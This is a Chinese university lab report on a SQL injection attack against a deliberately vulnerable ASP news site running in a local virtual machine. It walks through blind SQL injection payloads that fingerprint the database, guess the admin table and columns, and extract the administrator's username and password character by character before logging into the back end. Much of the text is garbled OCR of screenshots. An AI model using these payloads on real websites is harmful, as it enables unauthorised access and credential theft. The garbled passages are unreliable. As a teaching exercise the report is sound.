-1 -
-1 -
实验报告
(实验名称 : SQL 注入攻击)
、实验目的通过SQL注入攻击,掌握网站的工作机制,认识到 SQL注入攻击的防范措施, 加强对Web攻击的防范。
二、 实验环境
描述实验开展所基于的网络环境,给出网络拓扑、 IP地址、web服务器、客户
机等信息。
宿主机(客户机):操作系统为 Windows 10,IP为1 ,在主机上安 装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行 网络配置,采用环回适配器,桥接模式,实现宿主机与虚拟机之间的网络通信, 虚拟机(Web服务器):操作系统为 Windows XP,IP为, 本实验利用 windows的iis服务搭建了一个有 SQL注入漏洞的网站“ ASP新 闻发 布系统”,以该网站为目标,对其实施 SQL注入攻击。
本实验所需工具如下:
IIS是In ternet In formation Server的缩写,是微软提供的In ternet服务器软 件, 包括 Web FTP、Mail等服务器,也是目前常用的服务器软件。版本不限。
“啊D”注入工具:对“MSSQL显错模式”、“MSSQL不显错模式”、“Access’ 等数据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫描”、“管理 入口检测”、
“目录查看”等等于一身的注入工具包。
“ASP新闻发布系统” 0k3w v4.6源码。
三、 实验内容
(一)配置实验环境,
首先选择网络适配器,安装环回适配器,在主机上安装 VmwarePlayer,成功启
动虚拟机。接着配置宿主机和虚拟机的IP,如图.
要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge
姐果网笔恙持炯能 则可以乘取至动指派彩IP设気 否见「悔需妾认网 帝至跆谨男社衣舄适刍的IP设冒*
c信埶获得IP把址(6
@>使用下面的IP地址〔勺:
IP W(l)!
子网掩码M);
野迖尿去Q〕:
Iirteinpl 协说(TCP/IP)展性 ?|区
常规
辟劭議礬輪豔躡鬣勰睥蚩设品飙'
然后,验证宿主机和虚拟机是否联通,结果显示连接成功
程序,打开浏览器,输入地址“ ”,检查网IIS最后在虚拟机上安装站 搭建情况。-2 -
网需 身份強证艾享
洼接时星手:
亍 VMware Virtual Ethernet Adapter for VMnet8-
SSfC),..
1丈圭螢更弔下列瓊目Q:
回 Microsoft
"pVMw are Bridgie Protocol
<>安逋皿“smj〕厘性(Rj
<
>
安逋皿“
smj〕
厘性(Rj
JL铉蹈层拓扑发现响应程手
x InterstMidfeT 4 fTCP/IH4)
x Microsoft解S适配時蹌传送謎曲
A巻路层朽扑发現映肘器I/O驱动程韦
?Microsoft LLDP 硼皱曲稈闻
llicrosof t Windows [HS^ W. 0? 10586] Cc) 2015 licrosoft Corporation^ 編留所有权利?
C; \ VINDO1? S \ sy s t em3 2 >hdwwi z
L ■ \ Ilf『K^F"I广"lli ( U \ Lirr TLi 4- bhTTk'O O Tl Wb JT 1 G O H U G 1 O 1 1
成功!
(二)寻找注入点
,可以正常打开在宿主机上,打开网页 /list.asp?id=95
,可以正常打开
正在Ping 192. 168. 18. 11具有32字节的数据:
来自 192, 168. 12. 11 的回复:字节€2 时[5J<lins TTL=123 来百192, 168. 18. 11生回复:字节二置 时间丿丘口 HL=128 来百192. 168. 18. 11的回复:字节二置曲间匚Ins TTL = 12S 来自L92. 168. 18. 11的回复:字节切 时间Vims TTL=122
192, 168. 18. 11 的 Ping 统计信息:
数据包:已发送-4,已接收二L丢失二0 (0%丢失人 往返彳〒程的估计时间(叹毫秒为单位);
最短=Oms,最长=Oils,平均=0ms
C;MFINDOVS 扁 yst enBZ^ing 192. 168. 18.9
页面。正在Ping 192. 168. 18, 9具有32字节的数据: 来目L92. 168. 18.9的回复;字节匸亞 时祚3ms TTL=128
页面。
进行注入测试,键入 /list.asp?id=95 and 仁1 ,返回页
面不变。
-3 -
/list.asp?id=95 and 仁2 ,返回页面出错。键入
因此,可确定该网站存在注入点。
判断数据库类型 用系统表的方法进行判断,分别键入 from (select and
/list.asp?id=95 count(*)
sysobjects)>0
from
/list.asp?id=95 (select and
coun t(*)
msysobjects)>0
-4 -
U -ip - --p L. 【I启 Id iz i I
旳 「 WW里1側 聲 二芽慢换立磅屯樂
”若员人口 |瞥号1 ? ] SHi
r
则昴首向新H命叫
啤络安全
厲必制忏1
1榔u 1
屮曲帔计
越幅赏耳站忤:冋菇媒作號占篙省XPia-iE 11其功二址S■分用
<- O P* f@Ttt^9Z16&1M/lisUsp7ld=m2Qar>d%Wsel?t%20cwmCWOfrcm^QmsyHhK!=^ 住 -'竇Q Si?帧
O < ■■t^ KrilQJR-.Tr^l :T+E111SStv<) :t1 i 云法&rwT 无卞迂示国可
无法显示网页
tas询卿顾斗人渥,元刼乔?
出日轴方石刊料IT;
* 土小诅11卧呷"金乐
” KTff -L' -L'v-Ul...三市"辛.后豆睛關希E息帶蘇讲?
mi悄诧PW LOJ -芒#触旳话匸也*鈕苗逐
TrWr°r佶乏厉令
ferisfi〔司于宝曲心■
+卿癸
V- nr - ■flit J LI 3*t -hi - TnHri* (Crflri"'4n?¥lS
丁龍沁记K;虫「护毙二咗肖辽無Iffi应馆。
/likl.4k>r 忧 IE 厅
两者返回均出错,可知是access数据库。-5 -
猜测表名admi n中,我们先试一下,键入:一般网站后台的管理员都 默认在表 /list.asp?id=95 and (select count(*) from
adm in)v>0
合0 http//192,168,105/ i5t.asp?id = 959620arxj9fcM(select%20couitr>%?D"rc nV
合
无袪显示网灭
洁竽iH?ir u审ME:
admin的表。返回页面正常,可知该网站后台数据库中存在着表名为
admin
分别记但一般都有三个字段,(五)猜测字段名不同公司网站有不同的字段名, username, password。,录ID 号、用户名和密码,常用的字段名为:idfrom and (select cou nt(id) 键分别入 /list.asp?id=95
adm in)v>0
from (select cou nt(username) /list.asp?id=95 and
adm in)v>0
from coun t(password) and /list.asp?id=95 (select
adm in)v>0
*单击显阍观,莉肖启垂ii>
+扌一卄 主□?咗M三比三町岂信邑宀三旳罚言。
rtTTf铐漫500. ICO -阿.部紳帝渭谟-心F懾溪
Tnt?r?t信忌圖劳
(用于支特人员〉
*倉误益里:
Hicrc^D'ft TEI Engine (□:<6O04C?EO9)
押獗取曲:在「沖心血 上爰^谟取数翩I条 /list, tsp,第 e 冇
?娥署尝型:
ir?n 1.n fu:"』— mt ini rv unuj^j^ 山“-j■:鼻/eu了 g
(SiTML, Ide 4?k?) Cli-Mit/43.0. 2(523.^ Sifiri/Sl?. i6 SE
2 T W?t?Sr 1(1
-画:
GJH /list.右羽
?时间:
ZD1&U1Z月f巳J5取:阴
+住细倍慝: 忙?FOEdEt费特
password。
user name admin 三者返回均正常。 可知,表中存在的三个字段:
id ,,”的截图损坏,但是返回正常,望教员通融。注: “username
(六)猜测管理员用户名和密码 /list.asp?id=95 中有
几条记录,键入确定表1. admi n
and (select cou nt(*) from admi n)=1 返回页面正常。-6 -
admi n 只有一条记录。可知,表
/list.asp?id=95 and (select 2.猜测用户名长度,键入
续键入继回 len( user name) from adm in)=1 返出错,
/list.asp?id=95 and (select len(username) from
adm in)=2
3/4/5…,试续,出返回错继测
| ? htlf. /192.1CS.18.9 _:id?42G(ielrLtW2DLJLXjfiUid)96^0frcm%20dcJiiiiiC 心
□无;SS亍网
国十〕f D l计昔机网帘技术〉洋- '新礪讯卫%善爭尹
I M碌:,会员入口 祗号: |
I M碌:
V N 0 W
庖二暂闻衣堀采易力
| <3 68.18.9 : D1 ic - 5%2Qand%20(sdectM20c(]iJnt(pa5sword)%20fioni%20adr f 曲 '
止寻竝匸-左志显示网
◎ httpWl 9Z1 8.4/1 Istatp? ld=9 SK20iand%2(X^lKt%20count<l]^20f r&in%20admlnO=1 ,倉=
5。直到返回页面正确。测试到 5的时候,返回正常。可知,用户名长度为 位,用二分法,键入猜测用户名内容,采用 ASCII码分析法先猜测第1
3. /list.asp?id=95 and (select count(清誉i顽行F列新: 虽矣
清誉i顽行F列新:
虽矣Hll电汕詢r丟谄匕由1丸°
。a可知第一个字符为 依此类推,猜测之后的每一位字符,-8 -
9 //192.16S.1819/list.a5p?id=95%20and%20fe&lect^0 en(u&emame)^20^r
where
(asc(mid(username,1,1)))betwee n 30 and 125)<>0 返回正确,进一步缩小范
围。,,between 70 and 100 between 85 and 100 , between 90 and 100=97
收繭 6网茁导潮,r〒養席〒网
Q D (it为IO脸例设计) G蛀声I换細蛊傅傭1 <r0
无这显示网页
谊禺访2功直贞出H1I融"比去显下。
谄尝itKti阿城匸;
*卑击副新扌诩b瞬序洪
-抒开[晅辭上飞主页,鬆启查找与所需信割疲的铤新
MT7r佶谍500 100 -内訓轉鬻措罠-血绪谍
lLLtdt?L
'L O * ? ///1 i stasp? id= 959t20and%20(select^D len(ijS4mame)%20froi
■ 7
厶収辱舸网址导航D无囲瑟频
O D (吐x D Wt L 元第洞页 ;\ *
无袪■显示网页
■^宕 IV址寻氏 七击二L应6i.亡力自芒匚江.【i乐亠銅:J_蜀录
■^宕 IV址寻氏 七击二L应
6
i.亡力自芒匚江.【i乐亠
銅:
J_
蜀录
注期
F
內站百页
SfiM资讯|
|两络責全|
商页肃带|
|两站远首|
平閒设计
V K 0 W
ASF新间董布系掘赵&
2
2 Of p rn%2 0admln%20\^he re(a s<.(mi1;U5ema rri?r1J]))beriA een%20 909n20dnd^20l00)<>Cl V?
2
2 Of p rn%2 0admln%20\^he re(a s<.(mi1;U5ema rri?r1J]))beriA een%20 909n20dnd^20l00)<>Cl V?
(计耳机网睛按村灘
<7 h O W
壮P需i6J宣吊蒸编皿吕
r
网出肯页
1新同盗讯
1倒堵安全
网页制低用站运晉
平面设计
回堵细程滴示网站
nd^OGelect^^ountC^SOfrom^Oadmin^&SOwliere^sc^m dfuiemarrie 叮))注97)『、。
匕导萌匚元法灵示网
王册
U K O W
出P新闻衣齐糸统理E
凰站首页1
1新闻贯讯1
昭宾全1
屈页制忙
冏詰运莒
平面谡计1
削络细程1
潼示冏詰
:同码测4.猜密,理and
:同码测4.猜密,理and
(select /list.asp?id=95
len( password) from adm in)=6
-9 -
d?&SOfselect^Dcountf^SOfr om^O admin^G^fhvhere^scCrrbiaHu sc nanne, 2,2))) = 100) < >o|
卜寺益人匚悴:平钳:
卜寺益人匚
悴:
平钳:
汪册
I诂内齡:
网站百页I新闻资讯i网络安全丨刚页制作丨网站运肓 平向设计
位。所以密码为6
屠航
□无法
<计算电1网慈术》縈:
■ 'CU
? d
? d缩2。(seiect%2Ocourt(+)%20from?G2Oadmin%20讥here(Esc(mid;usernamer3r3;))- 1CQ]<>0| £
H^HiQ
H^HiQ 話曰谨刑科k虫* 冋帀P宿冋站忑运 谩廿 RL4W8 滝示科
? d
? d缩2。(seiect%2Ocourt(+)%20from?G2Oadmin%20讥here(Esc(mid;usernamer3r3;))- 1CQ]<>0| £
H^HiQ
H^HiQ 話曰谨刑科k虫* 冋帀P宿冋站忑运 谩廿 RL4W8 滝示科
d爲曹机网渚拽档廉 □ am咚农立变密一礙
,会员生] 脏昌:「 毎:
网姑首页 新闻资讯 朗绩安仝 囲页制柞 网曲运首I平面设计 朋络编趕 滝示网站
b会員入口 瞰号:
MF和“宣
MF和“宣H孫五E总
-10 -
Mwsn 新网遊刑岡彗冗土 marr 平百设计 wswe 常fh?站
印桃e抚keunt,)驾Mwn柯凶曲in%;Srf呻评MAK頼山:耳》呎畝$$彷?5!刃30 矣押笳触如丹^nta
矣押笳触如丹^nta那嗣哂舜血?n*“和admhi0讀,奋*
ram D薪红亍片
atf> C GHWW■郴翼 f D *
I ■ MAQ 杯 I HI: m ET1 II MWo
I C :
O;?F应k”]百” 匚科辭不 密: 4
?^1
-12 -
-12 -
-12 -
-12 -
~~V_=_V_JT
y 甘- 屬 ect ffluntrji hrtri m7p£ibfec±5.i Q 曲 曾富1 +.
m -近刼弼
['ph?叔口U K 0 W■f FH
['ph
?叔口
U K 0 W
■f FH里抚「廉专胡上
甲站EG 1$■夺M 畔占全 HIM制怅 HI曲医誉平西中计甲堵3耐玄示甲曲
嚅世切I西歯皿人诸邮
□ 'T r t .P ll
-11 -
■ 0 ? 4>l T
问冲cfiaXnntC曲Ofm畑旳組nEUQwhRn^i〕*]: ! <?■ 母mhB/UiTi? £ - 、■ Br vetmuniCr) ivnrrw^blvaU<Q 谢■ | * 9 & 生
■ft匚私晏〒耳
齢】 D <LtBWWw+) fli C|諛卫*<細 *
。6最终得到密码为位:123456
D”软件,点击进入“管理入口检测”选(七)寻找到后台管理窗口 打开“啊 项, 点击“检测管理入口”,进行检测,
0 .el ec(%?0oou n 1(*] %20from %20a d mi n%2Owh ere%?0%2 $c(mld (password^ 2D)=50) < > 0| * 曲-J |9
帥一|无氓后詡
i+)
二盘员△口 佔:登寻兰丑站内癖:
二盘员△口 佔:
登寻
兰丑
站内癖:
如图:打开检测到的各网址,测试是否为管理入口。为管理入口,如图:
/admi n/in dex.asp 可知,
(八)登陆后台 找到后台管理窗口, /admin/ad」ogin.asp
用刚刚得到的用户 名和密码登陆,后台登陆成功。 一
■ I EM附口HRiltWCTlDSAhin P就 IM IQ
■ I EM附口
HRiltWCTlDS
Ahin P就 IM IQ 9. 5ifiiLf
Xkhltji / J^ IM 10 別』Lfc/
亠h?r.|> .'/lIE If V 乩也《 all
^hlr> JK 1E£ BB 0 ■:kLhA込z wq:-
SL:£-
門
■臥g血
四、实验结果及分析
SQL注入攻击过程。
1) 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问,不存在
SQL 注入问题,如: /162414739931.shtml 就是普通的 网页访问。只有对数据库进行动态查询的业务才可能存在 SQL注入,如:
/list.asp?id=95 ,其中?id = 95表示数据库查询变量,这种语 句会在数据库中执行,因此可能会给数据库带来威胁。
2) 寻找SQL注入点。完成上一步的片断后,就要寻找可利用的注入漏洞,通过 输入一些特殊语句,可以根据浏览器返回信息,判断数据库类型,从而构建数 据库查询语句找到注入点。
3) 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过 构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度, 以及内容。这个过程可以通过网上大量注入工具快速实现,并借助破解网站轻易 破译用户密码。
4) 寻找WEB管理后台入口。通常 WEB后台管理的界面不面向普通用户开放, 要寻找至V后台的登陆路径,可以利用扫描工具快速搜索到可能的登陆地址,依 次进行尝试,就可以试出管理台的入口地址。
5) 入侵和破坏。成功登陆后台管理后,接下来就可以任意进行破坏行为,如篡 改网页、上传木马、修改、泄漏用户信息等,并进一步入侵数据库服务器。
实验心得:
在实验的过程中遇到了很多困难, 配置上的,环境上的,还有一些需要注意的小 问题,而且从整个实验的过程来讲也涉及到了很多软件的配合使用。
在整个实验中遇到的最大问题就是, 宿主机和虚拟机此前一直连不通, 通过宿主 机 ping 虚拟机,一直无法连接。直到最后我把虚拟机的防火墙关闭了,宿主机 才能访问虚拟机上发布的网页。
可见,防火墙还是有一定作用的, 但是对于网站 来说开通 - 13 -
了防火墙就没办法访问网页了。
- 14 -